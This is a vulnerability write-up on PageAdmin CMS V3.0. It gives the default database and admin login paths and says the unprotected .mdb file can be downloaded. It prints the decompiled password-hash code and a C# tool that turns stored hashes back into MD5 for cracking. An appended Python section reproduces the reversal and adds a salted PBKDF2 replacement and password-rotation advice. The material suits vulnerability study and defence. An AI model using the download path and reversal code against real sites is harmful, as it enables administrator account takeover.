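<p>In PageAdmin CMS V3.0, the default database path is "/e/database/v3.mdb" and the default admin login page is "/e/master/login.aspx". Because access to the database path is not restricted, the database file can be downloaded. By reversing the administrator's MD5 hashing algorithm, the MD5 digest can be recovered, and the administrator password can then be cracked from that MD5 digest.</p><p>The stored hashes turned out not to be standard MD5, so ILSpy was used to decompile the source and inspect how the password is hashed:</p><pre class="">// Requires: using System.Security.Cryptography; using System.Text;
public string Get_Md5(string s)
{
    MD5 mD = new MD5CryptoServiceProvider();
    Encoding encoding = Encoding.GetEncoding("UTF-8");
    string s2 = "pageadmin cms";
    byte[] array = mD.ComputeHash(encoding.GetBytes(s));
    byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2));
    StringBuilder stringBuilder = new StringBuilder(32);
    for (int i = 0; i < array.Length; i++)
    {
        // Each output segment is the sum of a password-digest byte and a constant-digest byte, in hex
        stringBuilder.Append(((int)(array[i] + array2[i])).ToString("x").PadLeft(2, '0'));
    }
    return stringBuilder.ToString();
}
</pre><p>This is the code of the reversing tool:</p><pre class=""><code>public static String unPageAdminPass(String pstr)
{
    MD5 mD = new MD5CryptoServiceProvider();
    Encoding encoding = Encoding.GetEncoding("UTF-8");
    string s2 = "pageadmin cms";
    byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2));
    StringBuilder stringBuilder = new StringBuilder(16);
    int index = 0;
    for (int i = 0; i < pstr.Length;)
    {
        // array[i] + array2[i] has a minimum of 0; the ASCII code of 0 is at least 30 and at most 512; 30 in hex is 1E, 512 in hex is 200
        // Critical: if this step is wrong, reversing the MD5 fails. This can only be estimated: the value is usually not below 20; if it is, the segment should be 3 characters long
        // If decoding fails, the ciphertext has to be split into 16 segments by hand and then reversed
        // Normally take 2 characters; if the segment starts with 1 or 2, take 3 characters. A segment starting with 2 could be "200", but that is very unlikely
        String sd_s = pstr.Substring(i, 2);
        // Only look at 3 characters when that many remain, so Substring cannot run past the end
        bool hasThree = i + 3 <= pstr.Length;
        if (hasThree && pstr.Substring(i, 3).StartsWith("200"))
        {
            // If the next 3 characters are 200, take 3 characters
            sd_s = pstr.Substring(i, 3);
            i += 3;
        }
        else if (hasThree && sd_s.StartsWith("1"))
        {
            // If it starts with sartNUM, also take 3 characters
            sd_s = pstr.Substring(i, 3);
            i += 3;
        }
        else {
            i += 2;
        }
        if (sd_s.StartsWith("0")) {
            // Strip the leading 0 (PadLeft added the 0, so it has to be removed when reversing)
            sd_s = sd_s.Remove(0, 1);
        }
        //165 9f e8 ec 102 189 9a a1 79 170 1ad 110 14e cd de 1a4
        int t = Convert.ToInt32(sd_s, 16);
        int r = t - (int)array2[index];
        stringBuilder.Append(r.ToString("x").PadLeft(2,'0'));
        index++;
    }
    return stringBuilder.ToString();
}</code></pre><p><img data-image-size="599,333" 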
src="https://images.seebug.org/contribute/68277f77-c171-44bd-9145-9bd1a7980ee8-Clipboard Image.png" alt="Clipboard Image.png"><br></p>
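<p>Added example (not part of the original write-up or of PageAdmin's code): a Python sketch showing that the Get_Md5 transform above only adds a fixed, public constant to an unsalted MD5 digest, so a stored value maps straight back to plain MD5 candidates, shown next to a salted PBKDF2 replacement. The function names, the sample password and the PBKDF2 parameters are assumptions made for illustration, and Python is used here instead of the page's C#.</p>

```python
import hashlib
import hmac
import os

# Constant recovered from the decompiled Get_Md5 above: MD5("pageadmin cms").
KEY = hashlib.md5("pageadmin cms".encode("utf-8")).digest()

def pageadmin_hash(password):
    """Python re-implementation of Get_Md5: byte-wise sums, hex, padded to 2 chars."""
    digest = hashlib.md5(password.encode("utf-8")).digest()
    return "".join(format(a + b, "x").rjust(2, "0") for a, b in zip(digest, KEY))

def candidate_md5s(stored):
    """Every plain MD5 hex digest consistent with a stored value.

    A segment is 2 or 3 hex chars (3 only without a leading zero); a split is
    kept only if it yields exactly 16 segments and each value - KEY[i] is a byte.
    """
    found = []

    def walk(pos, idx, out):
        if idx == len(KEY):
            if pos == len(stored):
                found.append(bytes(out).hex())
            return
        for width in (2, 3):
            seg = stored[pos:pos + width]
            if len(seg) < width or (width == 3 and seg[0] == "0"):
                continue
            byte = int(seg, 16) - KEY[idx]
            if 0 <= byte <= 255:
                walk(pos + width, idx + 1, out + [byte])

    walk(0, 0, [])
    return found

def strong_hash(password, salt=None, rounds=600_000):
    """Replacement scheme (assumed parameters): per-user salt + PBKDF2-HMAC-SHA256."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)

def verify_strong(password, salt, expected):
    """Constant-time comparison against the stored PBKDF2 output."""
    return hmac.compare_digest(strong_hash(password, salt)[1], expected)

if __name__ == "__main__":
    sample = "Constructed-Sample-1"  # constructed test password, not from the page
    stored = pageadmin_hash(sample)
    print(stored, hashlib.md5(sample.encode("utf-8")).hexdigest() in candidate_md5s(stored))
```

<p>Because the constant is identical for every installation, stored values from this scheme should be treated as exposed unsalted MD5 and the affected passwords rotated after migrating to a salted, slow hash.</p>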